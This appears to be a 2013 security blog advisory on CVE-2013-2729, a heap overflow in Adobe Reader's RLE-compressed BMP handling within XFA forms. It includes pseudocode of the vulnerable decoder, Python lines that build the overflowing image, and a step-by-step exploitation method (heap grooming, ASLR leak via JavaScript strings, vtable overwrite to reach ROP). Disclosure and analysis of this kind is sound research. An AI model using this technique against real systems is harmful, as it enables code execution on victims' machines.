Tuesday, May 14, 2013

Adobe Reader BMP/RLE heap corruption - CVE-2013-2729

Adobe Reader X is a powerful software solution developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF). Since version 10 it includes the Protected Mode, a sandbox technology similar to the one in Google Chrome which improves the overall security of the product.
  • Title: Adobe Reader BMP/RLE heap corruption
  • CVE Name: CVE-2013-2729
  • Permalink: http://blog.binamuse.com/2013/05/readerbmprle.html
  • Date published: 2013-05-14
  • Date of last update: 2013-05-14
  • Class: Client side Integer Overflow
Adobe Reader X fails to validate the input when parsing an embedded BMP RLE encoded image. Arbitrary code execution in the context of the sandboxed process is proved possible after a malicious bmp image triggers a heap overflow. Quick links: White paper, Exploit generator in python and PoC.pdf for Reader 10.1.4.

Vulnerability Details

The issue presented here is related to the parsing of a BMP file compressed with RLE8. The bug is triggered when Adobe Reader parses a BMP RLE encoded file embedded in an interactive PDF form. The dll responsible of handling the embedded XFA interactive forms(and the BMP) is the AcroForm.api plugin. So in order to get to the bug we first need to reach the XFA code.

PDF Forms

A PDF file can contain interactive Forms in two flavors:
  • The legacy, Forms Data Format (FDF or AcroForms)
  • The XML based, XML Forms Architecture (XFA)
There is support for different XFA Specifications since Acrobat 8.0 (ref. http://blogs.adobe.com/livecycle/2011/09/compatibility-matrix-for-xfa.html).
XFA VersionAcrobat Version
2.6Acrobat 8.1/Acrobat 8.11
2.7Acrobat 8.1
2.8Acrobat 9.0, Acrobat 9 ALang features
3.0Acrobat 9.1
3.3Acrobat 10.0
We will focus on last XFA specification available.

XFA, The XML Forms Architecture

The XML Forms Architecture (XFA) provides a template-based grammar and a set of processing rules that allow business to build interactive forms. At its simplest, a template-based grammar defines fields in which a user provides data. Among others it defines buttons, textfields, choicelists, images and a scripting API to validate the data and interact. It supports Javascript, XSLT an FormCalc as scripting language. A small XFA containing an image looks like this:
<template   xmlns:xfa="http://www.xfa.org/schema/xfa-template/3.1/">  
   <subform name="form1" layout="tb" locale="en_US" restoreState="auto">
         <pageArea name="Page1" id="Page1">
            <contentArea x="0.25in" y="0.25in" w="576pt" h="756pt"/>
            <medium stock="default" short="612pt" long="792pt"/>
      <subform w="576pt" h="756pt">
      <field name="ImageField" >
            <imageEdit data="embed"/>
            <image> AAAAA.. AAAAAA</image>
An XFA Form can be embedded in a common pdf stream and be rendered by all modern versions of Adobe Reader. The PDF catalog must contain the /NeedsRendering, /Extensions and /AcroForm fields. /AcroForm field must point to the form dictionary. Something like this..
3 0 obj
    << /Length 12345 >>
2 0 obj
    << /XFA 3 0 R >>
1 0 obj
    <<  /Type /Catalog
        /NeedsRendering true
        /AcroForm 2 0 R
        /Extensions <<
                      /ADBE <<
                              /BaseVersion /1.7
                              /ExtensionLevel 3
Graphically a PDF containing an XFA form has this structure:
At this point we can build a PDF containing a XFA Form containing an image. Let's see the BMP bug.

BMP - Run length encoding

The BMP can be compressed in two modes, absolute mode and RLE mode. Both modes can occur anywhere in a single bitmap. Ref. http://www.fileformat.info/format/bmp/corion-rle8.htm The RLE mode is a simple RLE mechanism, the first byte contains the count, the second byte the pixel to be replicated. If the count byte is 0, the second byte is a special, like EOL or delta. In absolute mode, the second byte contains the number of bytes to be copied literally. Each absolute run must be word-aligned that means you might have to add an additional padding byte which is not included in the count. After an absolute run, RLE compression continues.
Second byteMeaning
0End of line
1End of bitmap
2Delta. The next two bytes are the horizontal
and vertical offsets from the current position
to the next pixel.
3-255Switch to absolute mode

Bug pseudocode

Consider the followind C listing. This pseudo code is derived from the function responsible of expanding an RLE encoded BMP, found in AcroForm.api. The functions feof(), fread() and malloc() are the usual ones. The stream is a file from where it has already read the complete BMP header, including the height and the width. The main purpose of function is to expand the RLE encoded data. First it allocates enough memory to hold the complete image. Then it reads one byte to decide between one of the two modes: RLE or Absolute. In the RLE mode it repeats the next byte a number of times. In the Absolute mode there are more options implemented as a switch:
  • 0. End of line, fix the xpos/ypos indexes to point to the start of the next line.
  • 1. End of file, finish processing.
  • 2. Delta, moves the write pointer (e.g. to skip blank regions).
  • d. Literal data, copies data literally from the file.
Prove yourself and try to find the bug here:
  1. char* rle(FILE* stream, unsigned height, unsigned width){
  2.   assert(height < 4096 && height < 4096);
  3.   char * line;
  4.   char aux;
  5.   unsigned count;
  6.   struct {
  7.      unsigned char reps;
  8.      unsigned char value;
  9.   }cmd;
  10.   unsigned char xdelta, ydelta;
  11.   unsigned xpos = 0;
  12.   unsigned ypos = height - 1;
  13.   char * texture = malloc(height*width); //Safe mult!
  14.   assert(texture);
  15.   while ( !feof(stream)) {
  16.     fread(&cmd, 1, 2, stream);
  17.     if ( cmd.reps ) {
  18.       assert ( ypos < height && cmd.reps + xpos <= width );
  19.       for(count = 0; count<cmd.reps; count++) {   //RLE Mode, repeat the value
  20.           line = texture+(ypos*width);
  21.           line[xpos++] = cmd.value;
  22.         }
  23.     }
  24.     else {  // if rep is zero then value is a command
  25.         switch(cmd.value){
  26.             case 0:                          //End of line
  27.                 ypos -= 1;
  28.                 xpos = 0;
  29.                 break;
  30.             case 1:                          //End of bitmap. Done!
  31.                 return texture;
  32.             case 2:                          //Delta case, move bmp pointer
  33.                 read(&xdelta, 1, 1, stream); // read one byte
  34.                 read(&ydelta, 1, 1, stream); // read one byte
  35.                 xpos += xdelta;
  36.                 ypos -= ydelta;
  37.                 break;
  38.             default:                         // literal case
  39.                 assert ( ypos < height && cmd.value + xpos <= width );
  40.                 for(count = 0;count < cmd.value; count++){
  41.                     fread(&aux, 1, 1, stream);
  42.                     line = texture+(width*ypos);
  43.                     line[xpos++] = aux;
  44.                   }
  45.                 if ( cmd.value & 1 )             // padding
  46.                   fread(&aux, 1, 1, stream);
  47.         }//switch(cmd.value)
  48.     }//if (cmd.reps)
  49.   }//while(!feof(stream))
  50.   return texture;
  51. }
As you probably found out, there are no asserts at the "delta" case (line 32). So we could move the destination pointers arbitrarily, even outside the limits of the texture buffer. However, there are boundary checks when you try to actually write something to the texture buffer as in the line 39.
Note that this leaves a corner case in which a heap overflow condition can be triggered. Suppose we repeatedly send delta commands advancing the xpos index. And we continue to do so without trying to write anything until xpos gets really big, for example 0xffffff00. To accomplish this, the BMP should contain 0xffffff00/0xff delta commands each one incrementing the xpos in 0xff like this:
  1. bmp += '\x00\x02\xff\x00' * ((0xffffffff-0xff) / 0xff)
Then after padding, we pass a literal command to actually write up to 0xff bytes of data directly from the file to the pointed address. But as xpos+len(payload) overflows the 32bits integer representation, the boundary assertion holds and the overflow is possible.
  1. bmp += '\x00\x02'+chr(0x100-len(payload))+'\x00'
  2. bmp += '\x00'+chr(len(payload))+payload
Summing up, using this bug we can overwrite up to 256 bytes immediately before the texture buffer.

Exploitation details

The texture is allocated in the heap using the width and height found in the BMP header. So we control the size of the overflow-able allocation and we need to choose it wisely to overwrite something useful. But first to increase reliability it is better to prepare the heap with a sequence of allocations. We use the well known javascript method for allocating and freeing heap chunks. The exploitation script would be like this:
  • allocate 1000 0x12C chunks of controlled data. Very likely triggering a LFH of size 0x12C (0x12 (18)consecutive allocations will guarantee LFH enabled for a given SIZE).
  • free one every 10 chunks of the previously allocated chunks, generating several holes separated 10 chunks from each other.
It has been found that a structure of size 0x12C bytes is used after the decoding of all images. It contains pointers to the specific vtables and functions. The goal is to read and write this structure from javascript.

Leak an adress to javascript, read the struct

To achieve our goal, we first need to leak some pointer to the javascript interpreter so we could bypass ASLR and DEP. In order to learn the address of some dlls we need to be able to read an object structure from javascript. To get this we'll load a broken BMP image corrupting an LFH chunk header thus trick the allocator into believing that an alive javascript string memory is free.
  • Load a broken BMP with dimensions {1 , 0x12C}, its pixel texture (of size 0x12C) will be allocated in one of the prepared holes. The allocator will most likely assign one of the previously prepared holes to it.
  • An exception in the RLE decoder will delete all the used structures. In particular, the image texture chunk is freed. As its header is corrupted, this deletion will in fact delete the previous chunk and will leave the texture chunk alone. This wrongly deleted chunk is still used by the javascript interpreter. One of the string object leaving in the javascript interpreter still holds a pointer to the recently freed chunk.
    If you can overflow into a chunk that will be freed, the SegmentOffset in the heap chunk header can be used to point to another valid _HEAP_ENTRY. This could lead to controlling data that was previously allocated. See https://www.lateralsecurity.com/downloads/hawkes_ruxcon-nov-2008.pdf
    At this point we have a javascript string using memory that is known to be free. An allocation of 0x12C will probably be assigned to the same memory overlapping the javascript string. We aim for a javascript string to share the same memory with an object containing vtables so we can learn the location of some dll from the js interpreter. As we have chosen the chunk size carefully, this happens automatically and an interesting object gets allocated in the memory actually pointed by one of the javascript strings
  • Now lets' iterate over all javascript strings looking for the one that has changed
    1. for (i=0; i < spray.size; i+=1)
    2.    if ( spray.x[i] != null  &&
    3.        spray.x[i][0] != "\u5858"){
    4.    ...
    5.    }
  • If found, parse its contents and discover the address of AcroRd32.dll
    1. acro = (( util.unpackAt(spray.x[i], 14) >> 16) - offset) << 16;
    2. break;
At this point we have pinpointed the exact string index that shares the memory with an imgstruct and leaked the address of AcroRd.dll to the javascript interpreter.

Overwrite the struct

In javascript, strings are simply not writable. You need to free the old string and make a new copy of the string with the modifications you like. Usually, if the new string is the same size as the old one it will be allocated in the same spot. So to change the object contents we need to free the selected javascript string and realloc another in the same memory with different content.
  • Free the selected javascript string (which shares memory with the object)
  • Build a new 0x12C length string with the desired content using the leaked addresses, and spray it a bit so it is eventually allocated over the desired object
  • Allocate several new strings with the new content.
The object is most likely replaced by a new one pointing to a ROP sequence.

Controlling the execution flow

Calling the doc.close() function from the js interpreter will trigger the unload of all loaded XFA images and the use of the overwritten vtable Thus the replaced pointers in the object are used once more in the destructors and the control flow is captured. One last step involves to heap spray a pointer bed at a known address. A more specific technique(provided upon request) in which other heap addresses are leaked to the interpreter doesn't need this step.

No comments:

Post a Comment